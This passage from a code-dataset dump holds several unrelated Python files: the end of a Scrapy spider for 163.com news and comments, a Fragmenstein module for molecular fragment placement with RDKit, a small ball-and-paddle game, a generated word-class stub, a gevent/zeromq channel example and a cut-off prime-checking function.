helper.list2str(response.xpath('string(//div[@id=\"endText\"])').extract()).replace('\\t','')\n pipleitem['image_urls'] = helper.list2str(response.css('#endText img::attr(src)').extract())\n pipleitem['video_urls'] = helper.list2str(response.css('#endText source::attr(src)').extract())\n pipleitem['share'] = None\n pipleitem['like'] = response.meta['like']\n pipleitem['dislike'] = None\n pipleitem['views'] = None\n pipleitem['comment'] = response.meta['replyCount']\n pipleitem['crawl_time'] = helper.get_localtimestamp()\n\n return pipleitem\n\n def content2_parse(self, response):\n date = response.meta['date']\n if date == None or len(date) == 0: return\n try:\n if helper.compare_time(date, self.limittime) < 0: return\n except:\n return\n\n jsonbd = json.loads(response.text)\n if len(jsonbd[response.meta['id']]) == 0: return\n questions_body = jsonbd[response.meta['id']]\n\n pipleitem = CctvOpinionmonitor2Item()\n\n pipleitem['date'] = helper.formatTime(date)\n pipleitem['id'] = response.meta['id']\n pipleitem['url'] = response.url\n pipleitem['title'] = response.meta['title']\n pipleitem['source'] = response.meta['source']\n pipleitem['editor'] = None\n # pipleitem['content'] = helper.list2str(response.xpath('string(//div[@class=\"QuestionHeader-detail\"])').extract())\n pipleitem['content'] = helper.list2str(re.findall('>(.*?)<', questions_body['body']))\n # 
pipleitem['image_urls'] = helper.list2str(re.findall('<img.*?src=\"(.*?)\"',questions_body['content']))\n imglist = []\n for i in questions_body['img']:\n imglist.append(i['src'])\n pipleitem['image_urls'] = helper.list2str(imglist)\n pipleitem['video_urls'] = None\n pipleitem['share'] = None\n pipleitem['like'] = questions_body['threadVote'] if 'threadVote' in questions_body.keys() else None\n pipleitem['dislike'] = questions_body['threadAgainst'] if 'threadAgainst' in questions_body.keys() else None\n # pipleitem['views'] = response.xpath('//strong[@class=\"NumberBoard-itemValue\"]/@title').extract_first()\n pipleitem['views'] = None\n # pipleitem['comment'] = response.xpath('//meta[@itemprop=\"commentCount\"]/@content').extract_first()\n pipleitem['comment'] = questions_body['replyCount'] if 'replyCount' in questions_body.keys() else None\n pipleitem['crawl_time'] = helper.get_localtimestamp()\n\n return pipleitem\n","sub_path":"cctv_OpinionMonitor2/cctv_OpinionMonitor2/spiders/a163_com.py","file_name":"a163_com.py","file_ext":"py","file_size_in_byte":9852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"257758937","text":"########################################################################################################################\n__doc__ = \\\n \"\"\"\nThis is inherited by MonsterPlace\n \"\"\"\n\n########################################################################################################################\n\nfrom rdkit.Chem import rdmolops\n\nimport itertools\nimport json\nfrom collections import Counter\nfrom collections import defaultdict\nfrom typing import Optional, Dict, List, Tuple\nfrom warnings import warn\n\nimport numpy as np\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nfrom rdkit.Chem import rdFMCS, rdMolAlign, rdmolops\nfrom rdkit.Chem import rdmolops\nfrom rdkit.Geometry.rdGeometry import Point3D\n\nfrom ._communal import _MonsterCommunal\nfrom ._merge import _MonsterMerge\nfrom .unmerge_mapper import Unmerge\n\n\nclass _MonsterBlend(_MonsterMerge):\n # placement dependent methdos\n\n # @classmethod #why was this a classmethod\n def full_blending(self) -> None:\n \"\"\"\n a single scaffold is made (except for ``.unmatched``)\n \"\"\"\n self.mol_options = [self.simply_merge_hits()]\n scaffold = self.posthoc_refine(self.mol_options[0])\n chimera = self.make_chimera(scaffold)\n self.keep_copy(scaffold, 'scaffold')\n self.keep_copy(chimera, 'chimera')\n self.positioned_mol = self.place_from_map(target_mol=self.initial_mol,\n template_mol=chimera,\n atom_map=None)\n\n def partial_blending(self) -> None:\n \"\"\"\n multiple possible scaffolds for placement and best is chosen\n \"\"\"\n self.mol_options = self.partially_blend_hits() # merger of hits\n unrefined_scaffold, mode_index = self.pick_best()\n used = unrefined_scaffold.GetProp('_Name').split('-')\n self.unmatched = [h.GetProp('_Name') for h in self.hits if h.GetProp('_Name') not in used]\n scaffold = self.posthoc_refine(unrefined_scaffold)\n chimera = self.make_chimera(scaffold, mode_index)\n self.keep_copy(scaffold, 'scaffold')\n self.keep_copy(chimera, 'chimera')\n self.positioned_mol = self.place_from_map(target_mol=self.positioned_mol,\n template_mol=chimera,\n atom_map=None)\n\n def no_blending(self, broad=False) -> None:\n \"\"\"\n no merging is done. The hits are mapped individually. 
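The parse methods in a163_com.py repeat the null-safe lookup `item['x'] if 'x' in item.keys() else None`; dict.get expresses the same thing in one call. A sketch on a made-up item:

```python
item = {'postid': 'ABC123', 'ptime': '2019-04-24 12:00:00'}

id_ = item.get('postid')      # 'ABC123'
date = item.get('ptime')      # '2019-04-24 12:00:00'
source = item.get('source')   # None: key absent, same as the verbose form
```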
Not great for small fragments.\n \"\"\"\n maps = {}\n for template in self.hits:\n if broad:\n pair_atom_maps, _ = self.get_mcs_mappings(self.initial_mol, template)\n maps[template.GetProp('_Name')] = pair_atom_maps\n else:\n pair_atom_maps_t = self._get_atom_maps(self.initial_mol, template,\n atomCompare=rdFMCS.AtomCompare.CompareElements,\n bondCompare=rdFMCS.BondCompare.CompareOrder,\n ringMatchesRingOnly=True,\n ringCompare=rdFMCS.RingCompare.PermissiveRingFusion,\n matchChiralTag=True)\n pair_atom_maps = [dict(p) for p in pair_atom_maps_t]\n maps[template.GetProp('_Name')] = pair_atom_maps\n um = Unmerge(followup=self.initial_mol,\n mols=self.hits,\n maps=maps,\n no_discard=self.throw_on_discard)\n self.keep_copy(um.combined, 'scaffold')\n self.keep_copy(um.combined_bonded, 'chimera')\n self.unmatched = [m.GetProp('_Name') for m in um.disregarded]\n if self.throw_on_discard and len(self.unmatched):\n raise ConnectionError(f'{self.unmatched} was rejected.')\n self.journal.debug(f'followup to scaffold {um.combined_map}')\n # ------------------ places the atoms with known mapping ------------------\n placed = self.place_from_map(target_mol=self.initial_mol,\n template_mol=um.combined_bonded,\n atom_map=um.combined_map)\n alts = zip(um.combined_bonded_alternatives, um.combined_map_alternatives)\n placed_options = [self.place_from_map(target_mol=self.initial_mol,\n template_mol=mol,\n atom_map=mappa) for mol, mappa in alts]\n # ------------------ Averages the overlapping atoms ------------------\n self.positioned_mol = self.posthoc_refine(placed)\n self.mol_options = [self.posthoc_refine(mol) for mol in placed_options]\n\n # ================= Blend hits ===================================================================================\n\n def partially_blend_hits(self, hits: Optional[List[Chem.Mol]] = None) -> List[Chem.Mol]:\n \"\"\"\n This is the partial merge algorithm, wherein the hits are attempted to be combined.\n If the combination is bad. 
It will not be combined.\n Returning a list of possible options.\n These will have the atoms changed too.\n\n :param hits:\n :param distance:\n :return:\n \"\"\"\n\n if hits is None:\n hits = sorted(self.hits, key=lambda h: h.GetNumAtoms(), reverse=True)\n for hi, hit in enumerate(hits):\n # fallback naming.\n if not hit.HasProp('_Name') or hit.GetProp('_Name').strip() == '':\n hit.SetProp('_Name', f'hit{hi}')\n\n ## a dodgy hit is a hit with inconsistent mapping bwteen three.\n def get_dodgies(skippers):\n dodgy = []\n for hit0, hit1, hit2 in itertools.combinations(hits, 3):\n hn0 = hit0.GetProp('_Name')\n hn1 = hit1.GetProp('_Name')\n hn2 = hit2.GetProp('_Name')\n if any([hit in skippers for hit in (hn0, hn1, hn2)]):\n continue\n for a, b in inter_mapping[(hn0, hn1)].items():\n if a in inter_mapping[(hn0, hn2)] and b in inter_mapping[(hn1, hn2)]:\n if inter_mapping[(hn0, hn2)][a] != inter_mapping[(hn1, hn2)][b]:\n # TODO: THIS IS A BAD OPTION:\n # if all([m.GetAtomWithIdx(i).IsInRing() for m, i in ((hit0, a),\n # (hit1, b),\n # (hit2, inter_mapping[(hn0, hn2)][a]),\n # (hit2, inter_mapping[(hn1, hn2)][b]))]):\n # pass\n # else:\n dodgy.extend((hn0, hn1, hn2))\n d = Counter(dodgy).most_common()\n if dodgy:\n return get_dodgies(skippers=skippers + [d[0][0]])\n else:\n return skippers\n\n inter_mapping = {}\n for h1, h2 in itertools.combinations(hits, 2):\n inter_mapping[(h1.GetProp('_Name'), h2.GetProp('_Name'))] = self.get_positional_mapping(h1, h2)\n dodgy_names = get_dodgies([])\n self.warning(f'These combiend badly: {dodgy_names}')\n dodgies = [hit for hit in hits if hit.GetProp('_Name') in dodgy_names]\n mergituri = [hit for hit in hits if hit.GetProp('_Name') not in dodgy_names]\n merged = self.simply_merge_hits(mergituri)\n dodgies += [hit for hit in hits if hit.GetProp('_Name') in self.unmatched]\n self.unmatched = []\n combined_dodgies = []\n for h1, h2 in itertools.combinations(dodgies, 2):\n h_alt = Chem.Mol(h1)\n try:\n combined_dodgies.append(self.merge_pair(h_alt, h2))\n except ConnectionError:\n pass\n combinations = [merged] + dodgies + combined_dodgies\n # propagate alternatives\n while self.propagate_alternatives(combinations) != 0:\n pass\n return combinations\n\n def propagate_alternatives(self, fewer):\n pt = Chem.GetPeriodicTable()\n new = 0\n for template in list(fewer):\n for i, atom in enumerate(template.GetAtoms()):\n if atom.HasProp('_AltSymbol'):\n alt = Chem.Mol(template)\n aa = alt.GetAtomWithIdx(i)\n aa.SetAtomicNum(pt.GetAtomicNumber(atom.GetProp('_AltSymbol')))\n aa.ClearProp('_AltSymbol')\n atom.ClearProp('_AltSymbol')\n fewer.append(alt)\n new += 1\n return new\n\n def pick_best(self) -> Tuple[Chem.Mol, int]:\n \"\"\"\n Method for partial merging for placement\n\n :return: unrefined_scaffold, mode_index\n \"\"\"\n if len(self.mol_options) == 1:\n return self.mol_options[0], 0\n elif len(self.mol_options) == 0:\n raise ValueError('No scaffolds made?!')\n else:\n mapx = {} #: dictionary of key mol name and value tuple of maps and mode\n\n def template_sorter(t: List[Chem.Mol]) -> float:\n # key for sorting. 
requires outer scope ``maps``.\n n_atoms = len(mapx[t.GetProp('_Name')][0])\n mode = mapx[t.GetProp('_Name')][1]\n mode_i = self.matching_modes.index(mode)\n return - n_atoms - mode_i / 10\n\n ## get data\n # presort as this is expensive.\n for template in self.mol_options:\n # _get_atom_maps returns a list of alternative mappings which are lists of template to initail mol\n atom_maps = self._get_atom_maps(template, self.initial_mol,\n atomCompare=rdFMCS.AtomCompare.CompareElements,\n bondCompare=rdFMCS.BondCompare.CompareOrder,\n ringMatchesRingOnly=True,\n ringCompare=rdFMCS.RingCompare.PermissiveRingFusion,\n matchChiralTag=False)\n mapx[template.GetProp('_Name')] = (atom_maps, self.matching_modes[-1])\n # search properly only top 3.\n self.mol_options = sorted(self.mol_options, key=template_sorter)\n for template in self.mol_options[:3]:\n atom_map, mode = self.get_mcs_mapping(template, self.initial_mol)\n # get_mcs_mapping returns a dict going from template index to initial.\n mapx[template.GetProp('_Name')] = (atom_map, mode)\n self.journal.debug(f\"With {template.GetProp('_Name')}, \"+\\\n \"{len(atom_map)} atoms map using mode {self.matching_modes.index(mode)}\")\n ## pick best template\n self.mol_options = sorted(self.mol_options, key=template_sorter)\n ## Check if missing atoms can be explained by a different one with no overlap\n best = self.mol_options[0]\n ## Fuse overlaps\n # best_map = maps[best.GetProp('_Name')][0]\n # full = set(range(self.initial_mol.GetNumAtoms()))\n # present = set(best_map.values())\n # missing = full - present\n # for other in self.mol_options:\n # other_map = maps[other.GetProp('_Name')][0]\n # found = set(other_map.values())\n # if len(found) > 6 and len(present & found) == 0: # more than just a ring and no overlap\n # fusion = self._fuse(best, other, best_map, other_map)\n return best, self.matching_modes.index(mapx[best.GetProp('_Name')][1])\n\n # def _fuse(self, mol_A: Chem.Mol, mol_B: Chem.Mol, map_A: Dict[int, int], map_B: Dict[int, int]) -> Chem.Mol:\n # \"\"\"\n # Merge two compounds... but that are unlinked, using the followup as a guide.\n # Conceptually different but overlapping is join_neighboring_mols\n #\n # :param mol_A:\n # :param mol_B:\n # :param map_A:\n # :param map_B:\n # :return:\n # \"\"\"\n # # No longer needed.\n # fusion = Chem.RwMol(Chem.CombineMols(mol_A, mol_B))\n # t = mol_A.GetNumAtoms()\n # new_map_B = {k+t: v for k, v in map_B.items()}\n # full = set(range(self.initial_mol.GetNumAtoms()))\n # present_A = set(map_A.values())\n # present_B = set(map_B.values())\n #\n # def find_route(n):\n # if n in present_A:\n # return None\n # elif n in present_B:\n # return n\n # else:\n # path_raw = {m: find_route(m) for m in self.initial_mol.GetAtomWithIdx(n).GetNeighbors()}\n # path = {i: path_raw[i] for i in path_raw if path_raw[i] is not None}\n # if len(path) == 0:\n # return None\n # else:\n # return {n: path}\n\n # ================= Chimera ========================================================================================\n\n def make_chimera(self, template: Chem.Mol, min_mode_index=0) -> Chem.Mol:\n \"\"\"\n This is to avoid extreme corner corner cases.\n E.g. 
here the MCS is ringMatchesRingOnly=True and AtomCompare.CompareAny,\n while for the positioning this is not the case.\n\n :return:\n \"\"\"\n # get the matches\n atom_map, mode = self.get_mcs_mapping(template, self.initial_mol, min_mode_index=min_mode_index)\n follow = {**{k: str(v) for k, v in mode.items()}, 'N_atoms': len(atom_map)}\n self.journal.debug(f\"scaffold-followup: {follow}\")\n # make the scaffold more like the followup to avoid weird matches.\n chimera = Chem.RWMol(template)\n for scaff_ai, follow_ai in atom_map.items():\n if template.GetAtomWithIdx(scaff_ai).GetSymbol() != self.initial_mol.GetAtomWithIdx(\n follow_ai).GetSymbol():\n v = {'F': 1, 'Br': 1, 'Cl': 1, 'H': 1, 'B': 3, 'C': 4, 'N': 3, 'O': 2, 'S': 2, 'Se': 2, 'P': 6}\n wanted = self.initial_mol.GetAtomWithIdx(follow_ai)\n if wanted.GetSymbol() == '*': # all good then!\n continue\n owned = template.GetAtomWithIdx(scaff_ai)\n diff_valance = owned.GetExplicitValence() - v[wanted.GetSymbol()]\n if wanted.GetSymbol() in ('F', 'Br', 'Cl', 'C', 'H') and diff_valance > 0:\n continue # cannot change this.\n elif owned.GetExplicitValence() > 4 and wanted.GetSymbol() not in ('P',):\n continue\n else:\n newatom = Chem.Atom(wanted)\n stdev = chimera.GetAtomWithIdx(scaff_ai).GetDoubleProp('_Stdev')\n newatom.SetDoubleProp('_Stdev', stdev)\n origin = chimera.GetAtomWithIdx(scaff_ai).GetProp('_Origin')\n newatom.SetProp('_Origin', origin)\n chimera.ReplaceAtom(scaff_ai, newatom)\n if diff_valance > 0:\n chimera.GetAtomWithIdx(scaff_ai).SetFormalCharge(diff_valance)\n try:\n chimera.UpdatePropertyCache()\n except Chem.AtomValenceException as err:\n warn('Valance issue' + str(err))\n return chimera\n\n def place_from_map(self, target_mol: Chem.Mol, template_mol: Chem.Mol, atom_map: Optional[Dict] = None) -> Chem.Mol:\n \"\"\"\n This method places the atoms with known mapping\n and places the 'uniques' (novel) via an aligned mol (the 'sextant')\n This sextant business is a workaround for the fact that only minimised molecules can use the partial\n embedding function of RDKit.\n\n :param target_mol: target mol\n :param template_mol: the template/scaffold to place the mol\n :param atom_map: something that get_mcs_mapping would return.\n :return:\n \"\"\"\n # Note none of this malarkey: AllChem.MMFFOptimizeMolecule(ref)\n # prealignment\n if target_mol is None:\n target_mol = self.initial_mol\n sextant = Chem.Mol(target_mol)\n Chem.SanitizeMol(sextant)\n AllChem.EmbedMolecule(sextant)\n AllChem.MMFFOptimizeMolecule(sextant)\n ######################################################\n # mapping retrieval and sextant alignment\n # variables: atom_map sextant -> uniques\n if atom_map is None:\n atom_map, mode = self.get_mcs_mapping(target_mol, template_mol)\n msg = {**{k: str(v) for k, v in mode.items()}, 'N_atoms': len(atom_map)}\n self.journal.debug(f\"followup-chimera' = {msg}\")\n rdMolAlign.AlignMol(sextant, template_mol, atomMap=list(atom_map.items()), maxIters=500)\n # place atoms that have a known location\n putty = Chem.Mol(sextant)\n pconf = putty.GetConformer()\n chimera_conf = template_mol.GetConformer()\n uniques = set() # unique atoms in followup\n for i in range(putty.GetNumAtoms()):\n p_atom = putty.GetAtomWithIdx(i)\n p_atom.SetDoubleProp('_Stdev', 0.)\n p_atom.SetProp('_Origin', 'none')\n if i in atom_map:\n ci = atom_map[i]\n c_atom = template_mol.GetAtomWithIdx(ci)\n if c_atom.HasProp('_Stdev'):\n stdev = c_atom.GetDoubleProp('_Stdev')\n origin = c_atom.GetProp('_Origin')\n p_atom.SetDoubleProp('_Stdev', stdev)\n 
p_atom.SetProp('_Origin', origin)\n pconf.SetAtomPosition(i, chimera_conf.GetAtomPosition(ci))\n else:\n uniques.add(i)\n ######################################################\n # I be using a sextant for dead reckoning!\n # variables: sextant unique team\n categories = self._categorise(sextant, uniques)\n done_already = [] # multi-attachment issue.\n for unique_idx in categories['pairs']: # attachment unique indices\n # check the index was not done already (by virtue of a second attachment)\n if unique_idx in done_already:\n continue\n # get other attachments if any.\n team = self._recruit_team(target_mol, unique_idx, categories['uniques'])\n other_attachments = (team & set(categories['pairs'].keys())) - {unique_idx}\n sights = set() # atoms to align against\n for att_idx in [unique_idx] + list(other_attachments):\n for pd in categories['pairs'][att_idx]:\n first_sight = pd['idx']\n sights.add((first_sight, first_sight))\n neighs = [i.GetIdx() for i in sextant.GetAtomWithIdx(first_sight).GetNeighbors() if\n i.GetIdx() not in uniques]\n for n in neighs:\n sights.add((n, n))\n if self.attachment and list(categories['dummies']) and list(categories['dummies'])[0] in team:\n r = list(categories['dummies'])[0]\n pconf.SetAtomPosition(r, self.attachment.GetConformer().GetAtomPosition(0))\n sights.add((r, r))\n rdMolAlign.AlignMol(sextant, putty, atomMap=list(sights), maxIters=500)\n sconf = sextant.GetConformer()\n self.journal.debug(f'alignment atoms for {unique_idx} ({team}): {sights}')\n # self.draw_nicely(sextant, highlightAtoms=[a for a, b in sights])\n # copy position over\n for atom_idx in team:\n pconf.SetAtomPosition(atom_idx, sconf.GetAtomPosition(atom_idx))\n # the ring problem does not apply here but would result in rejiggling atoms.\n\n for other in other_attachments:\n done_already.append(other)\n # complete\n AllChem.SanitizeMol(putty)\n return putty # positioned_mol\n\n\n\n def transfer_ring_data(self, donor: Chem.Atom, acceptor: Chem.Atom):\n \"\"\"\n Transfer the info if a ringcore atom.\n\n :param donor:\n :param acceptor:\n :return:\n \"\"\"\n # if donor.GetIntProp('_ori_i') == -1:\n # data = donor\n pass\n\n # ========= Other ==================================================================================================\n\n def posthoc_refine(self, scaffold, indices: Optional[List[int]] = None) -> Chem.Mol:\n \"\"\"\n Averages the overlapping atoms.\n\n :param scaffold:\n :return:\n \"\"\"\n if indices is None:\n indices = list(range(scaffold.GetNumAtoms()))\n refined = Chem.RWMol(scaffold)\n refconf = refined.GetConformer()\n positions = defaultdict(list) # coordinates\n equivalence = defaultdict(list) # atom indices of hits.\n for h in self.hits:\n if h.GetProp('_Name') in self.unmatched:\n continue\n hc = h.GetConformer()\n for k, v in self.get_positional_mapping(scaffold, h).items():\n positions[k].append([hc.GetAtomPosition(v).x, hc.GetAtomPosition(v).y, hc.GetAtomPosition(v).z])\n equivalence[k].append(f'{h.GetProp(\"_Name\")}.{v}')\n for i in range(scaffold.GetNumAtoms()):\n if i not in indices:\n continue\n elif len(positions[i]) == 0:\n refined.GetAtomWithIdx(i).SetDoubleProp('_Stdev', 0.)\n refined.GetAtomWithIdx(i).SetDoubleProp('_Max', 0.)\n refined.GetAtomWithIdx(i).SetProp('_Origin', 'none')\n # warn(f'Atom {i} {scaffold.GetAtomWithIdx(i).GetSymbol}/{refined.GetAtomWithIdx(i).GetSymbol} '+ \\\n # 'in scaffold that has no positions.')\n else:\n p = np.mean(np.array(positions[i]), axis=0).astype(float)\n # sd = np.mean(np.std(np.array(positions[i]), 
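place_from_map relies on embedding and minimising the sextant before aligning it with an explicit atom map. A minimal sketch of that embed/minimise/align sequence using the same RDKit calls; the phenol molecule and identity map are arbitrary examples:

```python
from rdkit import Chem
from rdkit.Chem import AllChem, rdMolAlign

probe = Chem.MolFromSmiles('c1ccccc1O')
ref = Chem.MolFromSmiles('c1ccccc1O')
for m in (probe, ref):
    AllChem.EmbedMolecule(m)         # generate 3D coordinates
    AllChem.MMFFOptimizeMolecule(m)  # minimise before partial alignment

atom_map = [(i, i) for i in range(probe.GetNumAtoms())]
rmsd = rdMolAlign.AlignMol(probe, ref, atomMap=atom_map, maxIters=500)
print(rmsd)
```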
axis=0)).astype(float)\n ds = [np.linalg.norm(p - pi) for pi in positions[i]]\n sd = np.std(ds)\n md = np.max(ds)\n refined.GetAtomWithIdx(i).SetProp('_Origin', json.dumps(equivalence[i]))\n refined.GetAtomWithIdx(i).SetDoubleProp('_Stdev', sd)\n refined.GetAtomWithIdx(i).SetDoubleProp('_Max', md)\n if self.average_position:\n refconf.SetAtomPosition(i, Point3D(p[0], p[1], p[2]))\n Chem.SanitizeMol(refined,\n sanitizeOps=Chem.rdmolops.SanitizeFlags.SANITIZE_ADJUSTHS +\n Chem.rdmolops.SanitizeFlags.SANITIZE_SETAROMATICITY,\n catchErrors=True)\n return refined\n\n def get_mcs_mappings(self, molA, molB, min_mode_index: int = 0) -> Tuple[List[Dict[int, int]], dict]:\n \"\"\"\n This is a weird method. It does a strict MCS match.\n And then it uses laxer searches and finds the case where a lax search includes the strict search.\n\n :param molA: query molecule\n :param molB: target/ref molecule\n :param min_mode_index: the lowest index to try (opt. speed reasons)\n :return: mappings and mode\n \"\"\"\n strict_settings = dict(atomCompare=rdFMCS.AtomCompare.CompareElements,\n bondCompare=rdFMCS.BondCompare.CompareOrder,\n ringMatchesRingOnly=True,\n ringCompare=rdFMCS.RingCompare.PermissiveRingFusion,\n matchChiralTag=True)\n strict = self._get_atom_maps(molA, molB, **strict_settings)\n for i, mode in enumerate(self.matching_modes):\n if i < min_mode_index:\n continue\n lax = self._get_atom_maps(molA, molB, **mode)\n # remove the lax matches that disobey\n neolax = [l for l in lax if any([len(set(s) - set(l)) == 0 for s in strict])]\n if len(neolax) == 0:\n continue\n else:\n return [dict(n) for n in neolax], mode\n else:\n # Then the strict will have to do.\n return [dict(n) for n in strict], strict_settings # tuple to dict\n # raise ValueError('This is chemically impossible: nothing matches in the MCS step ' +\\\n # f'({len(self.matching_modes)} modes tried')\n\n def get_mcs_mapping(self, molA, molB, min_mode_index: int = 0) -> Tuple[Dict[int, int], dict]:\n \"\"\"\n This is a weird method. It does a strict MCS match.\n And then it uses laxer searches and finds the case where a lax search includes the strict search.\n\n :param molA: query molecule\n :param molB: target/ref molecule\n :param min_mode_index: the lowest index to try (opt. speed reasons)\n :return: mapping and mode\n \"\"\"\n ms, mode = self.get_mcs_mappings(molA, molB, min_mode_index)\n return ms[0], mode\n\n def _get_atom_maps(self, molA, molB, **mode) -> List[List[Tuple[int, int]]]:\n mcs = rdFMCS.FindMCS([molA, molB], **mode)\n common = Chem.MolFromSmarts(mcs.smartsString)\n matches = []\n # prevent a dummy to match a non-dummy, which can happen when the mode is super lax.\n is_dummy = lambda mol, at: mol.GetAtomWithIdx(at).GetSymbol() == '*'\n all_bar_dummy = lambda Aat, Bat: (is_dummy(molA, Aat) and is_dummy(molB, Bat)) or not (\n is_dummy(molA, Aat) or is_dummy(molB, Bat))\n for molA_match in molA.GetSubstructMatches(common, uniquify=False):\n for molB_match in molB.GetSubstructMatches(common, uniquify=False):\n matches.append([(molA_at, molB_at) for molA_at, molB_at in zip(molA_match, molB_match) if\n all_bar_dummy(molA_at, molB_at)])\n # you can map two toluenes 4 ways, but two are repeats.\n matches = set([tuple(sorted(m, key=lambda i: i[0])) for m in matches])\n return matches\n\n def _get_atom_map(self, molA, molB, **mode) -> List[Tuple[int, int]]:\n return self._get_atom_maps(molA, molB, **mode)[0]\n\n def pretweak(self) -> None:\n \"\"\"\n What if the fragments were prealigned slightly? 
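_get_atom_maps ends by pooling sorted tuples into a set, which is what collapses the symmetric duplicates mentioned in the toluene comment. The trick in isolation:

```python
matches = [
    [(0, 3), (1, 4), (2, 5)],
    [(2, 5), (0, 3), (1, 4)],  # same mapping, different traversal order
    [(0, 4), (1, 3), (2, 5)],  # genuinely different mapping
]
unique = set(tuple(sorted(m, key=lambda i: i[0])) for m in matches)
assert len(unique) == 2
```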
Really bad things.\n\n :return:\n \"\"\"\n warn('This method is unreliable. Do not use it')\n ref = self.hits[0]\n for target in self.hits[1:]:\n A2B = list(self.get_positional_mapping(target, ref, 0.5).items())\n if A2B:\n rdMolAlign.AlignMol(target, ref, atomMap=A2B, maxIters=500)\n else:\n warn(f'No overlap? {A2B}')\n\n @property\n def matched(self) -> List[str]:\n \"\"\"\n This is the counter to unmatched.\n It's dynamic as you never know...\n\n :return:\n \"\"\"\n return [h.GetProp('_Name') for h in self.hits if\n h.GetProp('_Name') not in self.unmatched]\n","sub_path":"fragmenstein/monster/_blend_place.py","file_name":"_blend_place.py","file_ext":"py","file_size_in_byte":27145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"419027468","text":"#RonaldRusso\nimport sys\nfrom graphics import *\nfrom random import randint\nimport time\n\nwin = GraphWin(\"My Game\", 800,500)\nwin.setBackground(\"light green\")\ngameover = False\n\npaddle = Rectangle(Point(350, 475), Point(450,490))\npaddle.setFill(\"red\")\npaddle.draw(win)\n\nrandx = randint (0,800)\nballPts = Point(randx,0)\nball = Circle(ballPts,15)\nball.draw(win)\nbally = ballPts.getY()\nballx = ballPts.getX()\n\nmessage = Text(Point(50,25), \"Score:\")\nmessage.setSize(25)\nmessage.draw(win)\n\nmessage2 = Text(Point(120,25), 0)\nmessage2.setSize(25)\nmessage2.draw(win)\nscore = 0\n\nwhile bally < 500:\n while gameover == False:\n\n movement = win.checkKey()\n if movement == \"a\":\n paddle.move(-25,0)\n elif movement == \"d\":\n paddle.move(25,0)\n\n bally = bally + 20\n ball.move(0,20)\n time.sleep(.1)\n paddlePt = paddle.getP1()\n paddlex = paddlePt.getX()\n if ballx >= paddlex and ballx <= paddlex + 100 and bally > 495:\n message2.undraw()\n score = score + 1\n message2 = Text(Point(120,25),score)\n message2.setSize(25)\n message2.draw(win)\n if score == 15:\n gameover = True\n win.close()\n exit()\n\n if ballx <= paddlex and bally > 495 or ballx >= paddlex + 100 and bally > 495:\n message2.undraw()\n score = score - 1\n message2 = Text(Point(120,25),score)\n message2.setSize(25)\n message2.draw(win)\n\n if score == -3:\n gameover = True\n win.close()\n exit()\n\n if bally >= 500:\n ball.undraw()\n randx = randint(10,800)\n ballPts = Point(randx,0)\n ball = Circle(ballPts,15)\n ball.draw(win)\n ballx = ballPts.getX()\n bally = 0\n","sub_path":"BallAndPaddle.py","file_name":"BallAndPaddle.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"489056072","text":"\n\nfrom xai.brain.wordbase.nouns._abode import _ABODE\n\n#calss header\nclass _ABODES(_ABODE, ):\n\tdef __init__(self,): \n\t\t_ABODE.__init__(self)\n\t\tself.name = \"ABODES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"abode\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_abodes.py","file_name":"_abodes.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"40010904","text":"# -*- coding:utf-8 -*-\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\n\nimport time\nimport gevent\nfrom gevent import monkey\n\nfrom corgi.zeromq import zmq\nfrom corgi.channel import Channel, RecvPoller\nfrom corgi.random import random_str\n\nmonkey.patch_all()\ncount = 10\nchannel = Channel()\nfor x in range(count):\n channel.send(random_str())\n\nfor x in 
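BallAndPaddle.py tests the catch/miss conditions inline against raw coordinates. A small helper that names the paddle's horizontal interval makes the same check easier to read (the width of 100 and the floor near y=495 match the shapes defined above):

```python
def paddle_catches(ball_x, ball_y, paddle_left, paddle_width=100, floor_y=495):
    # caught only if the ball reaches the floor within the paddle's span
    return ball_y > floor_y and paddle_left <= ball_x <= paddle_left + paddle_width

assert paddle_catches(400, 496, 350)       # centre of the starting paddle
assert not paddle_catches(200, 496, 350)   # wide of the paddle
```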
range(count):\n print('index: {}\\tmessage: {}'.format(x, channel.recv()))\n\n\ndef send(chan):\n chan.send(random_str())\n\n\ncount = 10\nfor x in range(count):\n gevent.spawn(send, channel)\n\n\ndef poll():\n msg_count = 0\n poller = RecvPoller([channel])\n while poller.is_active:\n for c, s, msg in poller.poll(timeout=1.0):\n if c is channel and s is zmq.POLLIN:\n print('count: {}\\tmsg :{}'.format(msg_count, msg))\n msg_count += 1\n if c is None:\n print('timeout', time.time())\n # if msg_count == 9:\n # poller.quit()\n\n\npoll_deamon = gevent.spawn(poll)\ngevent.joinall([poll_deamon])\n\n\n# output:\n# (py3) ➜ corgi git:(master) ✗ python examples/channel/channel.py\n# index: 0\tmessage: hcamcrjc\n# index: 1\tmessage: vdipwwnv\n# index: 2\tmessage: xealzdij\n# index: 3\tmessage: xylkoozm\n# index: 4\tmessage: fqlctmms\n# index: 5\tmessage: ixqcidrd\n# index: 6\tmessage: vzsjldts\n# index: 7\tmessage: gqcvtrqt\n# index: 8\tmessage: hflpiobm\n# index: 9\tmessage: woypttsq\n# count: 0\tmsg :ppnrdkhv\n# count: 1\tmsg :xzxuakmo\n# count: 2\tmsg :ertylxtw\n# count: 3\tmsg :nueqszlb\n# count: 4\tmsg :czkthrac\n# count: 5\tmsg :cavgixoj\n# count: 6\tmsg :hvzgtjix\n# count: 7\tmsg :duygrfol\n# count: 8\tmsg :udmddpno\n# count: 9\tmsg :zulmgbtl","sub_path":"examples/channel/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"58161655","text":"def premier(i):\r\n s=0\r\n n=int(i**(1/2))\r\n for j in range (2,n+1):\r\n if i%j==0: \r\n return False\r\n else : s+=1\r\n if s==(n-1):\r\n return True\r\n\r\ndef exo7(n):\r\n i=2\r\n s=0\r\n while 